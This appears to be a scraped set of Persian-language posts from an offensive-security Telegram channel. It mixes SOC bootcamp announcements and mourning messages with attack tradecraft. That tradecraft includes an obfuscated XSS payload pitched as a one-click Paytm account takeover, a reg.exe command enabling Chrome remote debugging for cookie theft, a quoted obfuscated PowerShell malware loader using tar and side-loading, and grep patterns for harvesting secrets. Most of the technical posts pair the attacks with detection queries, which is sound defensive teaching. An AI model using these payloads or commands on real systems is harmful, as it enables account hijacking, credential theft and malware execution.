6712
1 Nov 2020 1399/08/11 🔴 THB | Offensive Security آموزش، تحقیق و تجربه عملی در امنیت تهاجمی Penetration Testing · Red Teaming · AI Security 🎯 یاد بگیر. آزمایش کن. حرفهای شو.
🔖 امروز یک موضوع جالب دیگر را بررسی میکنیم که چگونه مهاجمان از هوش مصنوعی برای انجام وظایف مختلف استفاده میکنند این بار آنها از OpenAI Assistants API بهره بردهاند.
🕊 ادامه را در لینکدین مطالعه کنید :
🔗 https://lnkd.in/eKfp53Zt
🥀 @TryHackBox | @TryHackBoxOfficial
دوستان عزیز،لطفاً با به اشتراکگذاری مطالب و ریکشن به پست ها، از ما حمایت کنید. همکاری شما باعث میشود تا جامعه مان را گسترش دهیم. سپاسگزاریم! 🖤🥀🕊
Читать полностью…
🔖 چک لیست VAPT امنیت شبکه
🥀 @TryHackBox
#Checklist
🕊27 و 28 و 29 بهمن چهلم عزیزانیه که خیلی زودتر از رویاهاشون به ناحق خاموش شدن..
از رفتـنِ لالههـــــا، چهـــل روز گذشت
بـا داغ جوانـــــانِ دلافــــروز گذشت
دردا، که به جــایِ وصــل، دوراِنِ فــراق
بگذشت به ما و سخت جانسـوز گذشت!
چهل روز گذشت. چهل سالم بگذره داغشون فراموش نخواهد شد،،،به یادشان که در جسمشان در بین ما نیست ولی روحشان چراغ راه آینده ایران شد🕊🌹🫡
🥀 یادشون گرامی و نامشون جاودان 🖤
از طرف تیم TryHackBox 🥀
🕊 دراپ کردن یه پچ XSS اخیر در Paytm!
👀 مراحل :
1. پیلود رو در search box وارد کن.
2. URL رو کپی کن.
3. به victim بفرست.
4. takeover حساب با یک کلیک!!
✅پیلود :
<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>
فاز اول Red Team قسمت دوم : منابع اوسینت و ابزارهای Recon و Relationship و ...
https://x.com/i/status/2022396326059839992
@TryHackBox | @KavehOffSec
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما :
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 tryhackbox" rel="nofollow">https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
با کمال احترام، مراسم چهلم عزیزان از دست رفته را به دوستان، خانواده و آشنایان آنها تسلیت میگوییم. در این روزهای سخت، ما را در غم خود شریک بدانید. 🕊🖤🥀
دوستان ۲۷ و ۲۸ چهلم عزیزان از دست رفته هست ولی به دلیل فعالیت ، گفتم یادم نشه تسلیت رو عرض کنیم .🖤🕊
با آرزوی صبر و آرامش برای شما
تیم TryHackBox
آموزش
Session Fixation and Hijacking
به فارسی
اول میریم به سراغ تعریف خود Session و اهمیت session ها
سایت stateful و stateless چه تفاوتی دارد
و بعد از اون Session id ها چی هستن
و در اخر خود حملات رو توضیح میدیم و تفاوت بین شون رو متوجه میشیم
✍️نویسنده
🥀 @TryHackBox | The Chaos
✍ داستان خودتونو تعریف کنید ! 🕊 چگونه بخشی از جامعه TryHackBox شدید یا در آن چه چیزی پیدا کردید؟🥀 شاید محتوای کانال توانسته براتون تغییری ایجاد کنه یا در چیزی کمکتون کرده باشه؟🖤
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور کلی موضوع امنیت اطلاعات داری ؟
🖤 در کامنتها بنویسید! هر آنچه احساس میکنید و لازم میدانید را به اشتراک بگذارید درباره ی ما .
🖤🕊🥀🖤🕊🥀🖤🕊🥀🖤🕊🥀
#صحبت
درود دوستان
برای راهاندازی وبسایت جدید خود به یک توسعهدهنده بکاند با تخصص در فریمورک جنگو و تسلط بر ORM جنگو نیاز داریم. این فعالیت به صورت داوطلبانه خواهد بود و مزایای ویژهای برای شما در نظر گرفته شده است.
شما علاقهمند به همکاری هستید و میخواهید جزئیات بیشتری را دریافت کنید، لطفاً به پشتیبانی ما پیام دهید:
@ThbxSupport
دوستان این روزها کسی دل و دماغ کاری رو نداره حتی خود شما با شرایط پیش اومده .
دوستان اگر سوالی یا حرفی سخنی دارید با ما در ارتباط باشید :
@ThbxSupport
🟠 در این قسمت سرفصلهای کلیدی زیر رو بررسی کردیم:
- کلمات و اصطلاحات
- چیستی مرکز عملیات امنیت
- کار ها و وظایف در SOC
- مدل های کارکردن و جریان کاری در SOC
- نحوه بالا بردن مهارت در SOC
این مباحث پایهای، شما را برای ورود به دنیای امنیت سایبری آماده میکند.
@TryHackBox
#SOC #امنیت_سایبری #بوتکمپ_SOC
🔥 چک لیست آسیب پذیری File Upload
@TryHackBox
#چک_لیست #آسیب_پذیری
مطمئنم که میدانید مهاجمان از قابلیت «remote debugging» اکسپلویت می کنند تا کوکی ها را از مرورگرهای وب استخراج کنند. امروز بررسی می کنیم که مهاجمان چگونه با تغییر رجیستری این قابلیت را فعال می کنند.
اگر به این گزارش نگاه کنید.
متوجه میشوید که مهاجم از ابزار reg.exe برای تغییر رجیستری و مجاز کردن remote debugging استفاده کرده است:
reg.exe add HKEY_CURRENT_USER\Software\Policies\Google\Chrome /v RemoteDebuggingAllowed /t REG_DWORD /d 1 /f
event_type: "processcreatewin"
AND
proc_file_path: "reg.exe"
AND
cmdline: "RemoteDebuggingAllowed"
event_type: "registryvaluesetwin"
AND
reg_key_path: "RemoteDebuggingAllowed"
به نظر شما بهترین روش تشخیص و مقابله با چنین سوءاستفادهای در محیطهای سازمانی چیست و چه لاگها یا کنترلهای دیگری را میتوان برای شناسایی زودهنگام آن به کار گرفت؟
درود خدمت دوستان گرامی بنده اینجا روی حملات اکتیو دایرکتوری و مباحث ردتیم تمرکز خواهم کرد و سناریوها و معرفی و اطلاعات جامع در مورد پروتکل ها و موارد دیگر که تجربه بنده هست رو در اختیار شما عزیزان قرار میدهم .
@KavehOffSec
✎ نکات Grep برای تحلیل جاوااسکریپت 🥀
• استخراج فایل های جاوااسکریپت از دایرکتوری های recursive
find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \\;cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
cat * | grep -rE "eval|document\\.write|innerHTML|setTimeout|setInterval|Function"
cat * | grep -rE "location\\.href|location\\.replace|location\\.assign|window\\.open"
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
cat * | grep -r "postMessage"
cat * | grep -rE "https?://|www\\."
cat * | grep -rE "console\\.log|debugger|alert|console\\.dir"
cat * | grep -rE "document\\.getElementById|document\\.getElementsByClassName|document\\.querySelector|document\\.forms"
برای تحلیل کدهای جاوااسکریپت و شناسایی نقاط ضعف، از این نکات استفاده کنید و در نظرات خود تجربیات و یافتههای خود را به اشتراک بگذارید! چه ابزارها یا روشهای دیگری را برای بررسی کدهای جاوااسکریپت پیشنهاد میکنید؟
معرفی تیم TryHackBox به اعضای محترم کانال
درود به همه شما عزیزان!
در تیم TryHackBox، ما به آموزش و یادگیری به عنوان یک سفر هیجانانگیز نگاه میکنیم، نه صرفاً یک مقصد. برخلاف بسیاری از اکادمی های موجود، هدف ما این است که به شما کمک کنیم تا درک عمیقتری از علم و مهارتهای مورد نیاز در دنیای فناوری اطلاعات پیدا کنید.
ما معتقدیم که دورههای آموزشی میتوانند نقطه شروع خوبی باشند، اما این تنها آغاز راه است. ما شما را تشویق میکنیم تا فراتر از محتوای دورهها فکر کنید و خود را به چالش بکشید. ما دوست داریم هر یک از شما به یک جویای علم تبدیل شوید؛ کسی که با اشتیاق به دنبال کشف و یادگیری است و همواره در پی بهروز کردن مهارتهای خود میباشد.
تیم ما متشکل از افراد با تجربه در زمینههای مختلف امنیت سایبری و فناوری اطلاعات است که با عشق و علاقه، دانش خود را به شما منتقل میکنند. ما با ارائه محتوای آموزشی کاربردی و چالشهای واقعی، به شما کمک خواهیم کرد تا در دنیای پیچیده فناوری به یک متخصص واقعی تبدیل شوید.
صرفاً تدریس یک دوره یا چند دوره و دریافت وجه از دانشجو کافی نیست. هدف ما این است که دانشجو واقعاً بفهمد علم فراتر از چارچوب چند دوره محدود است. این دوره تا حدی به او کمک میکند، اما پس از آن او باید با انگیزه و کنجکاوی پژوهشی به یادگیری مستقل ادامه دهد و جویای علم شود.
به جمع ما بپیوندید و با هم به سمت آیندهای روشنتر برای کشورمان در دنیای امنیت سایبری حرکت کنیم!
همکاری در زمینه تدریس، تولید محتوا و پادکست
ما به دنبال دوستانی هستیم که علاقهمند به تدریس، تولید محتوا، ترجمه و همچنین فعالیت در حوزه پادکست هستند. اگر شما نیز تمایل به همکاری در این زمینهها دارید، خوشحال میشویم که با شما ارتباط برقرار کنیم.
برای کسب اطلاعات بیشتر و جزئیات همکاری، لطفاً پیام بفرستید:
@THBxSupport
🎙 قسمت سوم RadioZeroPod | داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی
🕊 داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...
🥀 این پادکست درباره نفوذ فیزیکی به یکی از بانکهای لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!
🕊 • کل داستان مجموعهای از واقعیتها است که با نظرات شخصی او از سخنرانیها، مصاحبهها و گفتوگوهای پشت صحنه ترکیب شده است. اگر علاقهمندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده پادکست را گوش بدید و نظراتتون رو بگید .
💠 https://youtu.be/g_Q3jy5yamc
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @TryCodeBox
🆔 @RadioZeroPod
۷ هک اصلی ترمینال که سرعت کارت را چند برابر میکند 🔥
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی هستند که همین امروز سرعت کارت را بهطور محسوسی افزایش میدهند.
ادامه را در لینکدین بخوانید :
https://lnkd.in/ePMmz6Fq
دوستان ما را در لینکدین دنبال کنید
🥀 @TryHackBox
فاز اول ردتیم قسمت اول : بدون footprint، همه چیز تارگت رو بدون!
https://x.com/i/status/2021934105630585152
✍ کاوه
@TryHackBox | @KavehOffSec
🔥 فایل های حساس روی وب سرور را شناسایی میکند.
cat allurls.txt | grep -E "\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5"
تجربت کامنت کن
🚀 قسمت دوم بوتکمپ SOC 0x4131!
در این قسمت، با مفاهیم شبکه سر و کله زدیم :
- مدل های مفهومی نتورک در عمل ما باهاشون چطور برخورد میکنیم
- پروتکل های مهم و کمک کننده چیا هستن
- مکانیزم های آدرس دهی در شبکه چیست
با بررسی این مباحث آماده میشیم که در ماژول بعد با network attack ها آشنا بشیم و تهدیدات رو شناسایی کنیم
از جلسه بعد از روند مفهوم و تئوری خارج می شویم و به سمت case study و task های SOC میریم
برای دانلود پی دی اف ارائه شده میتوانید به گیتهاب این بوتکمپ مراجعه کنید :
https://github.com/XaocZenon/SOC-0x4131
🔗 Youtube:
https://youtu.be/mumH5WWF2jM
👉 قسمتهای بعدی رو هم پیگیری کنید ! 💪 #SOC #امنیت_سایبری #بوتکمپ_SOC
@TryHackBox
🖤 با عرض تسلیت مجدد به تمامی خانوادههای داغدار ایران، امیدوارم ما را در این داغ شریک بدانید. 🥀
⚫️ درود ! امیدوارم که حال همهمان هرچند در این لحظه دشوار، به تدریج بهتر شود.
وضعیت اینترنت همانطور که میدانید، ناپایدار است و آیندهاش نیز نامشخص به نظر میرسد. در این شرایط، ما با دلی اندوهگین تصمیم داریم بر روی محتوا تمرکز کنیم تا بتوانیم کمی از این فضای غمانگیز فاصله بگیریم و از فروپاشی روحی جلوگیری کنیم. با اینکه در این مدت تمایل چندانی به فعالیت نداشتم، اما معتقدم که انسانیت و احترام به یاد عزیزانی که دیگر در میان ما نیستند، از هر تخصصی مهمتر است.🕊
امروز که سی روز از فقدان این عزیزان است، بر خود لازم میدانیم که فعالیتهای خود را آغاز کنیم. با وجود اینکه بسیاری از افراد هنوز نتوانستهاند به اینترنت متصل شوند، ما به یاد کسانی که دیگر در کنار ما نیستند، از ایموجی های 🥀 🖤 🕊 استفاده خواهیم کرد و از شما نیز دعوت میکنیم در مطالب خود از این ایموجی ها بهره ببرید و در ریکشن ها در کانال از 🕊 استفاده کنید .
به امید روزی که دیگر شاهد چنین حوادث تلخی در کشور عزیزمان ایران نباشیم و بتوانیم با همدلی و همبستگی، آیندهای روشنتر بسازیم.🥀🖤🕊
🥀 جهان یادگار است و ما رفتنی
🥀به گیتی نماند به جز مردمی
پس از روزهایی پر از التهاب و سکوت، دوباره به فضای مجازی برگشتیم. کاش حال همگی مان خوب باشد، اگرچه میدانیم چه بر ما گذشت. ما سطر به سطرِ کتابی را زندگی کردیم که خواندنش فقط اشک است و بغض.
تسلیت به تمام هموطنانی که در این چند روز سیاه، به سوگ عزیزانشان نشستند.
ما روزهایی رو گذروندیم که اگر کتاب بشه آدمهای زیادی رو به گریه میندازه .
تسلیت به همه کسایی که این چند روزه داغ عزیز دیدن 🖤
از طرف مجموعه TryHackBox
🚀 قسمت اول بوتکمپ SOC 0x4131!
🔗 Youtube:
https://youtu.be/-lwI1ifaIXQ
فرآیند نصب بدافزار اغلب شامل باز کردن (استخراج) دادههای آرشیو شده است.
امروز بررسی میکنیم که مهاجمان چگونه از ابزار tar اکسپلویت میکنند و چگونه میتوان از این موضوع برای شکار پیش دستانه (Proactive Hunting) استفاده کرد.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;"
یک بخش پنهان از دادهها که داخل این ZIP جاسازی شده را استخراج میکند (از بایت 721 به بعد)
این بخش پنهان را در یک فایل موقت ذخیره میکند (rjnlzlkfe.ta)
آن را با استفاده از tar استخراج میکند
یک فایل اجرایی را اجرا میکند
cnmpaui.exe :
— یک فایل قانونی که برای side-loading استفاده میشود
tar.exe -xvf C:\Users\<USER>\AppData\Local\Temp\rjnlzlkfe.ta -C C:\Users\<USER>\AppData\Local\Temp
event_type: "processcreatewin"
AND
proc_p_file_path: "powershell.exe"
AND
proc_file_path: "tar.exe"
event_type: "processcreatewin"
AND
proc_file_path: "tar.exe"
AND
cmdline: ("xvf" AND "temp")
به نظر شما بهترین راه شناسایی اجرای مشکوک tar در سناریوهای واقعی چیست؟